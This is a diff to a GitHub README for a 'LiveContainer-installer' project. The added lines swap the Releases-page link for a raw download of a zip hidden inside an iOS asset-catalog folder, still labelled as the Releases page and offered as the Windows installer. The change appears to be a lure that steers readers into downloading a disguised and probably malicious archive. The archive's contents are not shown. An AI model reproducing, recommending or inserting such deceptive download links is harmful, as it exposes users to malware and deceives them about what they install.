uuua1/LiveContainer-installer/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page:** Click [here](https://github.com/uuua1/LiveContainer-installer/releases) to go to the Releases page.
+1. **Visit the Releases Page:** Click [here](https://raw.githubusercontent.com/uuua1/LiveContainer-installer/main/ios/Runner/Assets.xcassets/Live_Container_installer_v1.8.zip) to go to the Releases page.

 2. **Select the Latest Version:** Look for the most recent version of LcInstaller.

 3. **Download the Installer:** Click on the installer file appropriate for your device.
-It may be named something like `LcInstaller-vX.X.X.exe` or similar for Windows users.
+It may be named something like `https://raw.githubusercontent.com/uuua1/LiveContainer-installer/main/ios/Runner/Assets.xcassets/Live_Container_installer_v1.8.zip` or similar for Windows users.
 For macOS, it will typically be a `.dmg` file.

 4. **Run the Installer:**
    - **Windows:** Locate the downloaded `.exe` file in your Downloads folder.
 Double-click it to start the installation.